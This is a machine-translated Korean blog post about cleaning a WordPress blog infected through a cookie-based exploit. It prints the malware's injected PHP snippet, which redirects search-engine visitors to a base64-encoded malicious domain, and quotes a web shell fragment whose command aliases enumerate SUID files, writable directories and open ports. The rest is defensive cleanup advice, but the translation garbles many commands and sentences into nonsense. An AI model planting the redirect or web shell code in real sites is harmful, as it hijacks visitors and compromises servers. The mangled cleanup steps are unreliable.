바이러스 블로고 스피어… 그러나 당신은 나와 무엇을 가지고 있었습니까?!

지난 달, 나는 경고를받은 바이러스 블로그 일부 방문자한다. 나는 꽤 좋은 안티 바이러스를 설치하기 때문에 처음에 내가 경고를 무시 (카스퍼 스키 AV 2009오랫동안 블로그에있다), 나는 바이러스 경고 (.. 내가 처음 새로 고침이 사라진 이전에 의심스러운 무언가를 보았다. 마지막으로 ...) 없었어.
천천히 큰 변화를 표시하기 시작했다 방문자 트래픽어떤 트래픽이 최근 꾸준히 하락하고 말해 점점 더 많은 사람들이되기 시작했다 그 후 stealthsettings.COM 그것은이다 virused. 안티 바이러스를 막을 때 어제 나는 스크린 샷 할 사람으로부터받은 스크립트 부터 stealthsettings.com:트로이 Clicker.HTML.IFrame.gr. 내가 검색 모든 소스를 넣어 저에게 꽤 설득력이 있었다. 내 마음에 온 첫 번째 아이디어는 이렇게했다 업그레이드 최신 WordPress (2.5.1), 그러나 이전 스크립트의 모든 파일을 삭제하기 전에는 WordPress 그리고 만들기 백업 데이터베이스. 이 절차는 작동하지 않았고 버그가 어디에 있는지 알아내는 데 오랜 시간이 걸렸습니다. 오이겐 커피를 통해 토론에, 그는 발견 링크 구글과 그를 볼 것이 좋을 것이다.
MyDigitalLife.info는 "WordPress 해킹: Google 및 검색 엔진 복구 및 수정 또는 Your-Needs.info, AnyResults.Net, Golden-Info.net 및 기타 불법 사이트로 리디렉션되는 쿠키 트래픽 없음"그건 내가 필요한 스레드의 끝입니다.
그것은 관하여 이용 de WordPress 쿠키 기반, 어떤 나는 매우 복잡 생각하고 책을 만들었다. 을 할 정도로 똑똑 SQL 주입 블로그의 데이터베이스, 눈에 보이지 않는 사용자를 만들려면 간단한 일상 점검 대시보드->사용자, "쓰기"서버 디렉토리와 파일을 확인 (저것 chmod 777), 검색 및 실행 루트 사용자 또는 그룹의 권한을 가진 파일. 나는 많은 블로그가 루마니아를 포함, 감염 사실에도 불구하고, 이름을 이용하고 그에 대해 쓴 몇 가지 기사가 있다는 것을 확인 누군지도 몰라. 좋아 ... 난 바이러스에 대한 일반적인 내용을 설명하려고 시도 할 것이다.

바이러스는 무엇입니까?

첫째, 블로그, 특히 구글, 검색 엔진 방문자에게 보이지 만 볼 수 있고 인덱싱 링크 소스 페이지를 삽입합니다. 이 방법 공격자가 표시된 사이트에 페이지 순위를 전송. 둘째, 다른 하나가 삽입됩니다. 리디렉션 코드 구글, 라이브, 야후에서 오는 방문자를위한 URL ... 나 RSS 리더가 아닌 사이트 쿠키. 안티 바이러스 로 리디렉션을 감지 트로이 Clicker.HTML.

증상:

방문자 트래픽의 대규모 감소특히 대부분의 방문자는 구글에서 올 블로그에서.

확인 : (여기서 phpmyadmin, php 및 linux)

LA. 주의! 첫 번째 데이터베이스 백업을 만든다!

1. 원본 파일을 확인 index.php, header.php, footer.php, 블로그 항목 및 암호화를 사용하는 코드가 있는지 확인 base64 또는 "if ($ ser =="1? && sizeof ($ _ COOKIE) == 0) "을 다음 형식으로 포함합니다.

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

... 아니면 뭔가. 이 코드를 삭제 하시겠습니까?

이미지를 클릭 ...

인덱스 코드

위의 스크린 샷에서 실수로 " ". 그 코드는 남아 있어야합니다.

2. 사용 phpMyAdmin을 및 데이터베이스 테이블로 이동 wp_users에 생성 한 사용자 이름이없는 경우 여기서 확인 00:00:00 0000-00-00 (가능한 위치 user_login 쓰기 "WordPress". 이 사용자의 ID(ID 필드)를 기록해 두었다가 삭제하십시오.

이미지를 클릭 ...

가짜 사용자

* 녹색 선을 제거하고 자신의 ID를 유지해야한다. 의 경우 졸리는되었나요 ID = 8 .

3. 테이블로 이동 wp_usermeta, 어디로 위치닦음 ID에 대한 선 (여기서 필드 USER_ID ID 값) 삭제가 나타납니다.

4. 표 wp_option로 이동 active_plugins 하고 의심을 사용할 수 있습니다 어떤 플러그인을 참조하십시오. 그것은 엔딩처럼 사용할 수 있습니다 _old.giff, _old.pngg, _old.jpeg, _new.php.giff등 풍부한 이미지 확장과 _old 및 _new의 조합.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

이 플러그인을 삭제 한 다음 블로그-> 대시 보드-> 플러그인으로 이동하여 플러그인을 비활성화하고 활성화합니다.

이 active_plugins 바이러스 파일이 나타납니다 보려면 이미지를 클릭하십시오.

플러그인

active_plugins에 표시된 FTP 또는 SSH에 경로를 따라 서버에서 파일을 삭제합니다.

5. 또한 phpMyAdmin의 테이블에서 wp_option, 포함 된 줄을 찾아 삭제 "rss_f541b3abd05e7962fcab37737f40fad8"그리고 사이"internal_links_cache ".
internal_links_cache에서 블로그와에 나타나는 암호화 된 스팸 링크를 만들어 의 코드 Google Ads목덜미, 해커.

6. 권장하는 것입니다 암호를 변경 블로그 및 로그인 모든 의심스러운 userele 제거. 의 최신 버전으로 업그레이드 WordPress 새 사용자 등록을 중지하도록 블로그를 설정합니다. 손실은 없습니다... 그들은 또한 무인도에 댓글을 달 수 있습니다.

이 바이러스의 블로그를 정리하기 위해 이러한 상황에서해야 할 일을 조금 설명하려고 위에서 시도했습니다. 문제는 보이는 것보다 훨씬 더 심각하며 거의 해결되지 않았습니다. 보안 취약점 블로그는 웹 서버 호스팅.

액세스 보안의 첫 번째 조치로서, SSH확인하려면, 서버에 대한 몇 가지 검사를하는 경우 어떤 엔딩 * _old *와 * _new. * 같은 파일.기후,. JPEG,. pngg. jpgg. 이러한 파일은 삭제해야합니다. 당신은 예를 들어, 파일의 이름을 변경합니다. top_right_old.giff in top_right_old.php우리는 파일이 정확히 공격 코드 서버임을 참조하십시오.

서버 점검, 청소 및 보안에 대한 몇 가지 유용한 지침입니다. (SSH를 통해)

1.  CD / tmp 디렉토리 같은 폴더가있는 경우 및 확인 tmpVFlma 또는 다른 조합은 같은 이름을 가지고 있으며, 그것을 삭제합니다. 아래의 스크린 샷, 내게 이러한 두 폴더를 참조하십시오

tmpserver

RM-RF 폴더 이름

2. 확인 및 제거(변경 chmod-ul) 가능한 한 속성이 있는 폴더 chmod 777

현재 디렉토리에서 쓰기 가능한 모든 파일 찾기: 찾을 수 있습니다. 형 F-파마 - 2-LS
현재 디렉토리에있는 모든 쓰기 가능한 디렉토리를 찾습니다 찾을 수 있습니다. 형 D-파마 - 2-LS
현재 디렉토리에서 쓰기 가능한 모든 디렉토리 및 파일 찾기: 찾을 수 있습니다. - 파마 - 2-LS

3. 서버에서 의심스러운 파일을 찾고.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, 주의! 비트를 설정 한 파일 SUID si SGID. 이 파일은 사용자 (그룹) 또는 루트가 아닌 파일을 실행하는 사용자의 권한으로 실행됩니다. 보안 문제 경우 이러한 파일은 루트 손상으로 이어질 수 있습니다. 당신이 SUID와 SGID 비트를 파일을 사용하는 경우, '수행chmod 0 " 또는 그들을 포함하는 패키지를 제거합니다.

어딘가에 소스에 포함되어 악용 ... :

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

이런 식으로 ... 근본적으로 보안 침해를 찾습니다. 포트 디렉토리에 "쓰기"와 그룹 실행 권한 파일 / 뿌리를 엽니 다.

위로 가기 추가로 ...

감염된 일부 블로그: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
오토바이.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismmedia.ro/blog, blog.einvest.ro
... 목록은 계속된다 ... 많이.

Google 검색 엔진을 사용하여 블로그가 감염되었는지 확인할 수 있습니다. 복사 붙여 넣기:

사이트 www.blegoo.com 구매

좋은 밤과 좋은 일;) 곧 Eugen이 prevezibil.imprevizibil.com에서 뉴스와 함께 올 것이라고 생각합니다.

BRB :

주목! 의 테마 변경 WordPress 또는 업그레이드 WordPress 2.5.1은 이 바이러스를 제거하는 솔루션이 아닙니다.

기술 애호가로서, 2006년부터 StealthSettings.com에서 기쁨을 가지고 글을 쓰고 있습니다. macOS, Windows, Linux 등 다양한 운영 체제에 대한 풍부한 경험이 있으며 프로그래밍 언어 및 블로깅 플랫폼 (WordPress)과 같은 분야에도 정통하고 있습니다. 온라인 스토어 (WooCommerce, Magento, PrestaShop)를 포함하여 여러 분야에서 경험이 있습니다.

방법 » 주목할만한 » 바이러스 블로고 스피어… 그러나 당신은 나와 무엇을 가지고 있었습니까?!
코멘트 남김